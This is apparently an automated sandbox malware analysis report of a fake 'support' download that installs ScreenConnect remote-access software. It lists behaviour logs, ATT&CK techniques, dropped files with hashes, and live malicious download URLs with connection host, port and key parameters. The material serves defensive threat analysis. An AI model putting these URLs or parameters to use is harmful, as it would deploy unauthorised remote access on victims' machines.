              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Downloads\support.Client.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Lowering of HIPS / PFW / Operating System Security Settings

              Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
              Source: svchost.exe, 0000000A.00000002.2408198631.000001F8A4F02000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
              Source: svchost.exe, 0000000A.00000002.2408198631.000001F8A4F02000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Downloads\support.Client.exe | Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob
              Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
              Source: C:\Program Files\Windows Defender\MpCmdRun.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
              Source: Yara match | File source: 00000011.00000000.1931309778.0000000000782000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: dfsvc.exe PID: 7692, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7256, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: ScreenConnect.ClientService.exe PID: 2212, type: MEMORYSTR
              Source: Yara match | File source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\ScreenConnect.WindowsClient.exe, type: DROPPED
              | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
              | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 41 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 121 Disable or Modify Tools | OS Credential Dumping | 2 File and Directory Discovery | Remote Services | Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
              | Credentials | Domains | Default Accounts | 1 Native API | 2 Windows Service | 2 Windows Service | 1 Timestomp | LSASS Memory | 55 System Information Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
              | Email Addresses | DNS Server | Domain Accounts | 1 Command and Scripting Interpreter | 1 Browser Extensions | 12 Process Injection | 1 DLL Side-Loading | Security Account Manager | 61 Security Software Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
              | Employee Names | Virtual Private Server | Local Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 21 Masquerading | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
              | Gather Victim Network Information | Server | Cloud Accounts | Launchd | 1 Registry Run Keys / Startup Folder | 1 Registry Run Keys / Startup Folder | 1 Modify Registry | LSA Secrets | 71 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
              | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | 1 Bootkit | RC Scripts | 71 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
              | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Process Injection | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
              | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Hidden Users | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
              | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Bootkit | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
              | IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 Rundll32 | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
              [Behavior graph. ID: 1544862; URL: https://cp9856.chelokipotle...; Start date: 29/10/2024; Architecture: WINDOWS; Score: 68. Main process chain shown: chrome.exe → support.Client.exe → dfsvc.exe → ScreenConnect.WindowsClient.exe → ScreenConnect.ClientService.exe]

              No Antivirus matches
              | Source | Detection | Scanner | Label | Link |
              | C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.ClientService.exe | 0% | ReversingLabs | | |
              | C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.WindowsBackstageShell.exe | 0% | ReversingLabs | | |
              | C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.WindowsFileManager.exe | 0% | ReversingLabs | | |
              | C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9\ScreenConnect.Core.dll | 0% | ReversingLabs | | |
              | C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9\ScreenConnect.Windows.dll | 0% | ReversingLabs | | |
              | C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\ScreenConnect.WindowsClient.exe | 4% | ReversingLabs | | |
              | C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd\ScreenConnect.Client.dll | 0% | ReversingLabs | | |
              | C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924\ScreenConnect.ClientService.dll | 0% | ReversingLabs | | |
              | C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Client.dll | 0% | ReversingLabs | | |
              | C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.ClientService.dll | 0% | ReversingLabs | | |
              | C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.ClientService.exe | 0% | ReversingLabs | | |
              | C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Core.dll | 0% | ReversingLabs | | |
              | C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Windows.dll | 0% | ReversingLabs | | |
              | C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsBackstageShell.exe | 0% | ReversingLabs | | |
              | C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsClient.exe | 4% | ReversingLabs | | |
              | C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsFileManager.exe | 0% | ReversingLabs | | |
              No Antivirus matches
              No Antivirus matches
              | Source | Detection | Scanner | Label | Link |
              | http://www.fontbureau.com/designers | 0% | URL Reputation | safe | |
              | http://www.sajatypeworks.com | 0% | URL Reputation | safe | |
              | http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe | |
              | http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe | |
              | http://www.urwpp.deDPlease | 0% | URL Reputation | safe | |
              | http://www.zhongyicts.com.cn | 0% | URL Reputation | safe | |
              | http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe | |
              | http://www.w3.or | 0% | URL Reputation | safe | |
              | http://www.carterandcone.coml | 0% | URL Reputation | safe | |
              | http://www.fontbureau.com/designers/frere-jones.html | 0% | URL Reputation | safe | |
              | http://www.fontbureau.com/designersG | 0% | URL Reputation | safe | |
              | http://www.fontbureau.com/designers/? | 0% | URL Reputation | safe | |
              | http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe | |
              | http://www.fontbureau.com/designers? | 0% | URL Reputation | safe | |
              | http://www.tiro.com | 0% | URL Reputation | safe | |
              | http://www.goodfont.co.kr | 0% | URL Reputation | safe | |
              | http://schemas.micro | 0% | URL Reputation | safe | |
              | http://www.typography.netD | 0% | URL Reputation | safe | |
              | http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe | |
              | http://www.w3.o | 0% | URL Reputation | safe | |
              | http://www.fonts.com | 0% | URL Reputation | safe | |
              | http://www.sandoll.co.kr | 0% | URL Reputation | safe | |
              | http://www.sakkal.com | 0% | URL Reputation | safe | |
              | http://www.fontbureau.com | 0% | URL Reputation | safe | |
              | http://www.xrml.org/schema/2001/11/xrml2core | 0% | URL Reputation | safe | |
              | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
              | bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | unknown |
              | www.google.com | 142.250.185.228 | true | false | | unknown |
              | cp3back96.site | 37.221.67.19 | true | false | | unknown |
              | cp9856.chelokipotlester.icu | 37.221.67.19 | true | true | | unknown |
              | fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | unknown |
              | Name | Malicious | Antivirus Detection | Reputation |
              | https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsClient.exe.config | false | | unknown |
              | https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.ClientService.dll | false | | unknown |
              | https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2f0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2fZuAUNQxVB6zV6MkV%2fQ3PQ8O4IKEUzM%2b1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2fCUtP6CZ%2f6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2b48fuhT%2fYi9ukTBmorR&r=&i=Untitled%20Session | false | | unknown |
              | https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsFileManager.exe.config | false | | unknown |
              | https://cp9856.chelokipotlester.icu/Bin/support.Client.exe?h=cp3back96.site&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2F0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2FZuAUNQxVB6zV6MkV%2FQ3PQ8O4IKEUzM%2B1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2FCUtP6CZ%2F6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2B48fuhT%2FYi9ukTBmorR&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&i=Untitled%20Session&e=Support&y=Guest&r= | false | | unknown |
              | https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsFileManager.exe | false | | unknown |
              | https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.manifest | false | | unknown |
              | https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.dll | false | | unknown |
              | https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Core.dll | false | | unknown |
              | https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.config | false | | unknown |
              | https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsClient.exe | false | | unknown |
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://www.sakkal.comdfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://cp9856.chelokipotlester.icudfsvc.exe, 0000000E.00000002.2346639670.00000212A348D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A398A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3A29000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                            unknown
                                                                                                                                                            https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000007.00000003.1366380334.0000024F94662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1366965576.0000024F94624000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                http://www.apache.org/licenses/LICENSE-2.0dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  http://www.fontbureau.comdfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsFileManager.exe.configgdfsvc.exe, 0000000E.00000002.2359951085.00000212BB8EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.ClientService.exe_dfsvc.exe, 0000000E.00000002.2368068234.00000212BEFDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=cp3backC7EOHWRV.log.14.dr, Unconfirmed 974768.crdownload.0.dr, chromecache_128.1.drfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 00000007.00000002.1367177095.0000024F94681000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          http://www.xrml.org/schema/2001/11/xrml2coredfsvc.exe, 0000000E.00000002.2346639670.00000212A32B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application#ScreenConnect.Widfsvc.exe, 0000000E.00000002.2346639670.00000212A362E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 00000007.00000002.1367024630.0000024F9463F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366380334.0000024F94662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1367108889.0000024F94665000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                              • 75% < No. of IPs
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 142.250.185.228 | www.google.com | United States | 15169 | GOOGLEUS | false |
| 239.255.255.250 | unknown | Reserved | unknown | unknown | false |
| 37.221.67.19 | cp3back96.site | Russian Federation | 48430 | FIRSTDC-ASRU | true |
                                                                                                                                                                              IP
                                                                                                                                                                              192.168.2.16
                                                                                                                                                                              127.0.0.1
                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                              Analysis ID:1544862
                                                                                                                                                                              Start date and time:2024-10-29 19:33:35 +01:00
                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                              Overall analysis duration:0h 5m 50s
                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                              Report type:full
                                                                                                                                                                              Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                                              Sample URL:https://cp9856.chelokipotlester.icu/Bin/support.Client.exe?h=cp3back96.site&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2F0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2FZuAUNQxVB6zV6MkV%2FQ3PQ8O4IKEUzM%2B1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2FCUtP6CZ%2F6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2B48fuhT%2FYi9ukTBmorR&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&i=Untitled%20Session&e=Support&y=Guest&r=
                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                              Number of analysed new started processes analysed:25
                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                              Technologies:
                                                                                                                                                                              • EGA enabled
                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                              Detection:MAL
                                                                                                                                                                              Classification:mal68.evad.win@46/81@7/5
                                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, backgroundTaskHost.exe
                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 142.250.184.227, 66.102.1.84, 216.58.212.174, 34.104.35.123, 184.28.90.27, 192.229.221.95, 199.232.210.172, 142.250.185.227, 172.217.16.142
                                                                                                                                                                              • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, cacerts.digicert.com, clientservices.googleapis.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, c-ring.msedge.net, edgedl.me.gvt1.com, ocsp.digicert.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, update.googleapis.com, clients.l.google.com, t-ring-fallbacks1.msedge.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                              • VT rate limit hit for: https://cp9856.chelokipotlester.icu/Bin/support.Client.exe?h=cp3back96.site&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2F0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2FZuAUNQxVB6zV6MkV%2FQ3PQ8O4IKEUzM%2B1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2FCUtP6CZ%2F6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2B48fuhT%2FYi9ukTBmorR&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&i=Untitled%20Session&e=Support&y=Guest&r=
| Time | Type | Description |
|---|---|---|
| 14:34:07 | API Interceptor | 2x Sleep call for process: svchost.exe modified |
| 14:34:28 | API Interceptor | 983224x Sleep call for process: dfsvc.exe modified |
| 14:34:28 | API Interceptor | 1x Sleep call for process: support.Client.exe modified |
| 14:35:14 | API Interceptor | 1x Sleep call for process: MpCmdRun.exe modified |
                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1310720
                                                                                                                                                                              Entropy (8bit):0.8168438845432417
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3072:yJjAgNE4Pj5vHcjTcyBP9UjaaQ/ka4qWE:QAgN8nj/ka4
                                                                                                                                                                              MD5:C0490496F823DC08A2C515AC94F1B090
                                                                                                                                                                              SHA1:24BF8B8B71A8CC1259830DED338FEA633B5645FE
                                                                                                                                                                              SHA-256:AA778C7CE69CA0CD5D0085FD84327EA7C57486C68E96C2A4FA242B09F2508C6D
                                                                                                                                                                              SHA-512:A655B76A551495D02F5D4F2C3BEEE495E40A84C56D55BF6263681593D66D28BF37DC4794D7996EEA280FA5694E8146B2384D4CDB00D350B5FA93DA1DEE3A7CF9
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x28b44850, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1310720
                                                                                                                                                                              Entropy (8bit):0.7864522398203245
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:7SB2ESB2SSjlK/6vDfi5Wy10MctJ+t9ka4XQ0/Ykr3g16L2UPkLk+kyt4eCu3uZB:7azaovh7uka4Es2U1RFNp3pvHzrHBHz
                                                                                                                                                                              MD5:A47D87F8D039B5EB99EFF663F42895B3
                                                                                                                                                                              SHA1:9D8A5B40792B41E9B9A0059170FA7ADB346CF85D
                                                                                                                                                                              SHA-256:9DDB7CEAE5054CE24F2E9F6786A50CF1B8D750B91374101290DEC7E6ECA510BC
                                                                                                                                                                              SHA-512:DE14A4B3F4DC6BBF92890724EFFFF95C6C75C9F2626C070D91DDF973FFFF0BCE8503D00A98B6806BCFD7A640832D83BA472F3608598275DD6A0FF23B90CE0528
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):16384
                                                                                                                                                                              Entropy (8bit):0.07936432973900195
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:uGEYeVK6om/Msjv/Ss/IGYZX/J+vl/lAllSdLvl+/rS56/:5EzVK6+sYIvltAQN0e
                                                                                                                                                                              MD5:4BF0FEA28136A2D38DD500BDC4E4D34A
                                                                                                                                                                              SHA1:9C060E055A7F66B6FC9C3B9FD7BC1766EC481AA4
                                                                                                                                                                              SHA-256:80CDE3D8062A0158B96E5D34F6918D66DE350761B020A1D2BD392F7E46F9795B
                                                                                                                                                                              SHA-512:8F2889A21E847EE64B5F47DDC21A102DD4F2BE8156EE4BDDE4A72DA7766BB87D9353CBAB9193547E0445CEBD973DE4AFF5856E91D49D6CB65E7CCB7E0384748B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):71954
                                                                                                                                                                              Entropy (8bit):7.996617769952133
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                                              MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                                              SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                                              SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                                              SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):727
                                                                                                                                                                              Entropy (8bit):7.581021982372214
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:5o6Tq9HF5h44TkY1Zdbh1SaIHS+j6R1k4NZ2B72qJjOGh7N0StoFFc7c9hR0NJ1y:50AY5NAUN8B7bJjl+c7c9hJf
                                                                                                                                                                              MD5:0FECCC0993702C65B5DB8E87DCB0E0CA
                                                                                                                                                                              SHA1:0C87C5C32841A3823B28A31FE8DE6CF5F29F8C5F
                                                                                                                                                                              SHA-256:A114EF8F6E3890193DA00C170526A66E2720A7A6339773E8A30CABE55F1D9366
